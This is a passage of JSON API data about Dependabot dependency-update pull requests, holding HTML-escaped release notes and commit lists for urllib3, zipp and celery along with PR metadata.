(2025-06-18)\u003c/h1\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for the \u003ccode\u003ecompression.zstd\u003c/code\u003e module that is new in Python 3.14.\nSee \u003ccode\u003ePEP 784 \u0026lt;https://peps.python.org/pep-0784/\u0026gt;\u003c/code\u003e_ for more information. (\u003ccode\u003e[#3610](https://github.com/urllib3/urllib3/issues/3610) \u0026lt;https://github.com/urllib3/urllib3/issues/3610\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eAdded support for version 0.5 of \u003ccode\u003ehatch-vcs\u003c/code\u003e (\u003ccode\u003e[#3612](https://github.com/urllib3/urllib3/issues/3612) \u0026lt;https://github.com/urllib3/urllib3/issues/3612\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a security issue where restricting the maximum number of followed\nredirects at the \u003ccode\u003eurllib3.PoolManager\u003c/code\u003e level via the \u003ccode\u003eretries\u003c/code\u003e parameter\ndid not work.\u003c/li\u003e\n\u003cli\u003eMade the Node.js runtime respect redirect parameters such as \u003ccode\u003eretries\u003c/code\u003e\nand \u003ccode\u003eredirects\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eRaised exception for \u003ccode\u003eHTTPResponse.shutdown\u003c/code\u003e on a connection already released to the pool. (\u003ccode\u003e[#3581](https://github.com/urllib3/urllib3/issues/3581) \u0026lt;https://github.com/urllib3/urllib3/issues/3581\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eFixed incorrect \u003ccode\u003eCONNECT\u003c/code\u003e statement when using an IPv6 proxy with \u003ccode\u003econnection_from_host\u003c/code\u003e. Previously would not be wrapped in \u003ccode\u003e[]\u003c/code\u003e. (\u003ccode\u003e[#3615](https://github.com/urllib3/urllib3/issues/3615) \u0026lt;https://github.com/urllib3/urllib3/issues/3615\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e2.4.0 (2025-04-10)\u003c/h1\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApplied PEP 639 by specifying the license fields in pyproject.toml. (\u003ccode\u003e[#3522](https://github.com/urllib3/urllib3/issues/3522) \u0026lt;https://github.com/urllib3/urllib3/issues/3522\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eUpdated exceptions to save and restore more properties during the pickle/serialization process. (\u003ccode\u003e[#3567](https://github.com/urllib3/urllib3/issues/3567) \u0026lt;https://github.com/urllib3/urllib3/issues/3567\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003everify_flags\u003c/code\u003e option to \u003ccode\u003ecreate_urllib3_context\u003c/code\u003e with a default of \u003ccode\u003eVERIFY_X509_PARTIAL_CHAIN\u003c/code\u003e and \u003ccode\u003eVERIFY_X509_STRICT\u003c/code\u003e for Python 3.13+. (\u003ccode\u003e[#3571](https://github.com/urllib3/urllib3/issues/3571) \u0026lt;https://github.com/urllib3/urllib3/issues/3571\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a bug with partial reads of streaming data in Emscripten. (\u003ccode\u003e[#3555](https://github.com/urllib3/urllib3/issues/3555) \u0026lt;https://github.com/urllib3/urllib3/issues/3555\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eMisc\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSwitched to uv for installing development dependecies. (\u003ccode\u003e[#3550](https://github.com/urllib3/urllib3/issues/3550) \u0026lt;https://github.com/urllib3/urllib3/issues/3550\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003emultiple.intoto.jsonl\u003c/code\u003e asset from GitHub releases. Attestation of release files since v2.3.0 can be found on PyPI. (\u003ccode\u003e[#3566](https://github.com/urllib3/urllib3/issues/3566) \u0026lt;https://github.com/urllib3/urllib3/issues/3566\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e2.3.0 (2024-12-22)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/aaab4eccc10c965897540b21e15f11859d0b62e7\"\u003e\u003ccode\u003eaaab4ec\u003c/code\u003e\u003c/a\u003e Release 2.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/7eb4a2aafe49a279c29b6d1f0ed0f42e9736194f\"\u003e\u003ccode\u003e7eb4a2a\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/f05b1329126d5be6de501f9d1e3e36738bc08857\"\u003e\u003ccode\u003ef05b132\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/d03fe327a71d09728512217149f269763671f296\"\u003e\u003ccode\u003ed03fe32\u003c/code\u003e\u003c/a\u003e Fix HTTP tunneling with IPv6 in older Python versions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/11661e9bb4278e43d081f47a516e287a928c2206\"\u003e\u003ccode\u003e11661e9\u003c/code\u003e\u003c/a\u003e Bump github/codeql-action from 3.28.0 to 3.29.0 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3624\"\u003e#3624\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/6a0ecc6b16fe30f721021b44a81d19615098c71e\"\u003e\u003ccode\u003e6a0ecc6\u003c/code\u003e\u003c/a\u003e Update v2 migration guide to 2.4.0 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3621\"\u003e#3621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/8e32e60d9024c05bc6f7adda08bdf6c539d0b0d4\"\u003e\u003ccode\u003e8e32e60\u003c/code\u003e\u003c/a\u003e Raise exception for shutdown on a connection already released to the pool (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3\"\u003e#3\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/9996e0fbf90b77083ad3c73737a6c6395703faa9\"\u003e\u003ccode\u003e9996e0f\u003c/code\u003e\u003c/a\u003e Fix emscripten CI for Chrome 137+ (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3599\"\u003e#3599\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/4fd1a99a59725faf0efc946ce3b6bc9a194420af\"\u003e\u003ccode\u003e4fd1a99\u003c/code\u003e\u003c/a\u003e Bump RECENT_DATE (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3617\"\u003e#3617\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/c4b5917e911a90c8bf279448df8952a682294135\"\u003e\u003ccode\u003ec4b5917\u003c/code\u003e\u003c/a\u003e Add support for the new \u003ccode\u003ecompression.zstd\u003c/code\u003e module in Python 3.14 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3611\"\u003e#3611\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/urllib3/urllib3/compare/1.26.5...2.5.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `zipp` from 3.3.0 to 3.19.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jaraco/zipp/blob/main/NEWS.rst\"\u003ezipp's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003ev3.19.1\u003c/h1\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproved handling of malformed zip files. (\u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/119\"\u003e#119\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev3.19.0\u003c/h1\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement is_symlink. (\u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/117\"\u003e#117\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev3.18.2\u003c/h1\u003e\n\u003cp\u003eNo significant changes.\u003c/p\u003e\n\u003ch1\u003ev3.18.1\u003c/h1\u003e\n\u003cp\u003eNo significant changes.\u003c/p\u003e\n\u003ch1\u003ev3.18.0\u003c/h1\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBypass ZipFile.namelist in glob for better performance. (\u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/106\"\u003e#106\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRefactored glob functionality to support a more generalized solution with support for platform-specific path separators. (\u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/108\"\u003e#108\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd special accounting for pypy when computing the stack level for text encoding warnings. (\u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/114\"\u003e#114\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev3.17.0\u003c/h1\u003e\n\u003cp\u003eFeatures\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/6d1cb72aa55e0536f35d2af128994b5a61ca4c1a\"\u003e\u003ccode\u003e6d1cb72\u003c/code\u003e\u003c/a\u003e Finalize\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/fd604bd34f0343472521a36da1fbd22e793e14fd\"\u003e\u003ccode\u003efd604bd\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/120\"\u003e#120\u003c/a\u003e from jaraco/bugfix/119-malformed-paths\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/c18417ed2953e181728a7dac07bff88a2190abf7\"\u003e\u003ccode\u003ec18417e\u003c/code\u003e\u003c/a\u003e Add news fragment.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/58115d2be968644ce71ce6bcc9b79826c82a1806\"\u003e\u003ccode\u003e58115d2\u003c/code\u003e\u003c/a\u003e Employ SanitizedNames in CompleteDirs. Fixes broken test.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/564fcc10cdbfdaecdb33688e149827465931c9e0\"\u003e\u003ccode\u003e564fcc1\u003c/code\u003e\u003c/a\u003e Add SanitizedNames mixin.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/79a309fe54dc6b7934fb72e9f31bcb58f2e9f547\"\u003e\u003ccode\u003e79a309f\u003c/code\u003e\u003c/a\u003e Add some assertions about malformed paths.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/2d015c22348fab46ca765339f55f84fe9d6e8115\"\u003e\u003ccode\u003e2d015c2\u003c/code\u003e\u003c/a\u003e Merge \u003ca href=\"https://github.com/jaraco/skeleton\"\u003ehttps://github.com/jaraco/skeleton\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/a595a0fad054cd20b69d3e954c99174e3a548938\"\u003e\u003ccode\u003ea595a0f\u003c/code\u003e\u003c/a\u003e Rename extras to align with core metadata spec.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/608f90a6e74919501577a1312dc5c7d8e1d391d7\"\u003e\u003ccode\u003e608f90a\u003c/code\u003e\u003c/a\u003e Finalize\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/3a22d724acf874111b43f87f7110225122ec3de5\"\u003e\u003ccode\u003e3a22d72\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/118\"\u003e#118\u003c/a\u003e from jaraco/feature/is-symlink\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/jaraco/zipp/compare/v3.3.0...v3.19.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `celery` from 4.1.0 to 5.5.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/celery/celery/releases\"\u003ecelery's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.5.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003emake the tests run on python 3.13 for gcs backend by \u003ca href=\"https://github.com/auvipy\"\u003e\u003ccode\u003e@​auvipy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9677\"\u003ecelery/celery#9677\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdded DeepWiki to README by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9683\"\u003ecelery/celery#9683\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eLimit redis to \u0026lt;=v5.2.1 to match Kombu by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9693\"\u003ecelery/celery#9693\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse EX_OK instead of literal zero by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9684\"\u003ecelery/celery#9684\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake wheel metadata reproducible by \u003ca href=\"https://github.com/cjwatson\"\u003e\u003ccode\u003e@​cjwatson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9687\"\u003ecelery/celery#9687\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003elet celery install from kombu dependencies for better align by \u003ca href=\"https://github.com/auvipy\"\u003e\u003ccode\u003e@​auvipy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9696\"\u003ecelery/celery#9696\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix stamping documentation to clarify stamped_headers key is optional in visitor methods by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9697\"\u003ecelery/celery#9697\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport apply_async without queue argument on quorum queues by \u003ca href=\"https://github.com/bityob\"\u003e\u003ccode\u003e@​bityob\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9686\"\u003ecelery/celery#9686\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdated rabbitmq doc about using quorum queues with task routes by \u003ca href=\"https://github.com/bityob\"\u003e\u003ccode\u003e@​bityob\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9707\"\u003ecelery/celery#9707\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd: Dumper Unit Test by \u003ca href=\"https://github.com/yiyu0x\"\u003e\u003ccode\u003e@​yiyu0x\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9711\"\u003ecelery/celery#9711\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd unit test for event.group_from by \u003ca href=\"https://github.com/rogerforlife\"\u003e\u003ccode\u003e@​rogerforlife\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9709\"\u003ecelery/celery#9709\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erefactor: add beat_cron_starting_deadline documentation warning by \u003ca href=\"https://github.com/alirafiei75\"\u003e\u003ccode\u003e@​alirafiei75\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9712\"\u003ecelery/celery#9712\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: resolve issue \u003ca href=\"https://redirect.github.com/celery/celery/issues/9569\"\u003e#9569\u003c/a\u003e by supporting distinct broker transport options for workers by \u003ca href=\"https://github.com/yiyu0x\"\u003e\u003ccode\u003e@​yiyu0x\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9695\"\u003ecelery/celery#9695\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFixes issue with retry callback arguments in DelayedDelivery by \u003ca href=\"https://github.com/maccinza\"\u003e\u003ccode\u003e@​maccinza\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9708\"\u003ecelery/celery#9708\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eget_exchange-unit-test by \u003ca href=\"https://github.com/rogerforlife\"\u003e\u003ccode\u003e@​rogerforlife\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9710\"\u003ecelery/celery#9710\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eISSUE-9704: Update documentation of result_expires, filesystem backend is supported by \u003ca href=\"https://github.com/MattiasDC\"\u003e\u003ccode\u003e@​MattiasDC\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9716\"\u003ecelery/celery#9716\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eupdate to blacksmith ubuntu 24.04 by \u003ca href=\"https://github.com/auvipy\"\u003e\u003ccode\u003e@​auvipy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9717\"\u003ecelery/celery#9717\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdded unit tests for celery.utils.iso8601 by \u003ca href=\"https://github.com/jaiganeshs21\"\u003e\u003ccode\u003e@​jaiganeshs21\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9725\"\u003ecelery/celery#9725\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate introduction.rst docs by \u003ca href=\"https://github.com/auvipy\"\u003e\u003ccode\u003e@​auvipy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9728\"\u003ecelery/celery#9728\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrepare for release: v5.5.3 by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9732\"\u003ecelery/celery#9732\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bityob\"\u003e\u003ccode\u003e@​bityob\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9686\"\u003ecelery/celery#9686\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yiyu0x\"\u003e\u003ccode\u003e@​yiyu0x\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9711\"\u003ecelery/celery#9711\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rogerforlife\"\u003e\u003ccode\u003e@​rogerforlife\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9709\"\u003ecelery/celery#9709\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/alirafiei75\"\u003e\u003ccode\u003e@​alirafiei75\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9712\"\u003ecelery/celery#9712\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/maccinza\"\u003e\u003ccode\u003e@​maccinza\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9708\"\u003ecelery/celery#9708\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MattiasDC\"\u003e\u003ccode\u003e@​MattiasDC\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9716\"\u003ecelery/celery#9716\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaiganeshs21\"\u003e\u003ccode\u003e@​jaiganeshs21\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9725\"\u003ecelery/celery#9725\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/celery/celery/compare/v5.5.2...v5.5.3\"\u003ehttps://github.com/celery/celery/compare/v5.5.2...v5.5.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.5.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix calculating remaining time across DST changes by \u003ca href=\"https://github.com/imrivera\"\u003e\u003ccode\u003e@​imrivera\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9669\"\u003ecelery/celery#9669\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove \u003ccode\u003esetup_logger\u003c/code\u003e from COMPAT_MODULES by \u003ca href=\"https://github.com/rconradharris\"\u003e\u003ccode\u003e@​rconradharris\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9668\"\u003ecelery/celery#9668\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix mongodb bullet and fix github links in contributions section by \u003ca href=\"https://github.com/jabberwock404\"\u003e\u003ccode\u003e@​jabberwock404\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9672\"\u003ecelery/celery#9672\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrepare for release: v5.5.2 by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9675\"\u003ecelery/celery#9675\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/imrivera\"\u003e\u003ccode\u003e@​imrivera\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9669\"\u003ecelery/celery#9669\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rconradharris\"\u003e\u003ccode\u003e@​rconradharris\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9668\"\u003ecelery/celery#9668\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jabberwock404\"\u003e\u003ccode\u003e@​jabberwock404\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9672\"\u003ecelery/celery#9672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/celery/celery/compare/v5.5.1...v5.5.2\"\u003ehttps://github.com/celery/celery/compare/v5.5.1...v5.5.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.5.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/celery/celery/blob/main/Changelog.rst\"\u003ecelery's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e5.5.3\u003c/h1\u003e\n\u003cp\u003e:release-date: 2025-06-01\n:release-by: Tomer Nosrati\u003c/p\u003e\n\u003cp\u003eWhat's Changed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- make the tests run on python 3.13 for gcs backend ([#9677](https://github.com/celery/celery/issues/9677))\n- Added DeepWiki to README ([#9683](https://github.com/celery/celery/issues/9683))\n- Limit redis to \u0026lt;=v5.2.1 to match Kombu ([#9693](https://github.com/celery/celery/issues/9693))\n- Use EX_OK instead of literal zero ([#9684](https://github.com/celery/celery/issues/9684))\n- Make wheel metadata reproducible ([#9687](https://github.com/celery/celery/issues/9687))\n- let celery install from kombu dependencies for better align ([#9696](https://github.com/celery/celery/issues/9696))\n- Fix stamping documentation to clarify stamped_headers key is optional in visitor methods ([#9697](https://github.com/celery/celery/issues/9697))\n- Support apply_async without queue argument on quorum queues ([#9686](https://github.com/celery/celery/issues/9686))\n- Updated rabbitmq doc about using quorum queues with task routes ([#9707](https://github.com/celery/celery/issues/9707))\n- Add: Dumper Unit Test ([#9711](https://github.com/celery/celery/issues/9711))\n- Add unit test for event.group_from ([#9709](https://github.com/celery/celery/issues/9709))\n- refactor: add beat_cron_starting_deadline documentation warning ([#9712](https://github.com/celery/celery/issues/9712))\n- fix: resolve issue [#9569](https://github.com/celery/celery/issues/9569) by supporting distinct broker transport options for workers ([#9695](https://github.com/celery/celery/issues/9695))\n- Fixes issue with retry callback arguments in DelayedDelivery ([#9708](https://github.com/celery/celery/issues/9708))\n- get_exchange-unit-test ([#9710](https://github.com/celery/celery/issues/9710))\n- ISSUE-9704: Update documentation of result_expires, filesystem backend is supported ([#9716](https://github.com/celery/celery/issues/9716))\n- update to blacksmith ubuntu 24.04 ([#9717](https://github.com/celery/celery/issues/9717))\n- Added unit tests for celery.utils.iso8601 ([#9725](https://github.com/celery/celery/issues/9725))\n- Update introduction.rst docs ([#9728](https://gi...\n\n_Description has been truncated_","html_url":"https://github.com/Waka758/Hot-Food/pull/1","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Waka758%2FHot-Food/issues/1","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1/packages"}},{"old_version":"1.10.0","new_version":"1.11.0","update_type":"minor","path":null,"pr_created_at":"2025-06-28T21:55:36.000Z","version_change":"1.10.0 → 1.11.0","issue":{"uuid":"2626504697","node_id":"PR_kwDOGSMLgc6cjUf5","number":94,"state":"closed","title":"build(deps): bump the pip group across 1 directory with 8 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":"2025-06-28T21:57:48.000Z","author_association":"NONE","state_reason":null,"created_at":"2025-06-28T21:55:36.000Z","updated_at":"2025-06-28T21:57:48.000Z","time_to_close":132,"merged_at":"2025-06-28T21:57:48.000Z","merged_by":"zxenonx","closed_by":null,"dependency_metadata":{"prefix":"build(deps): 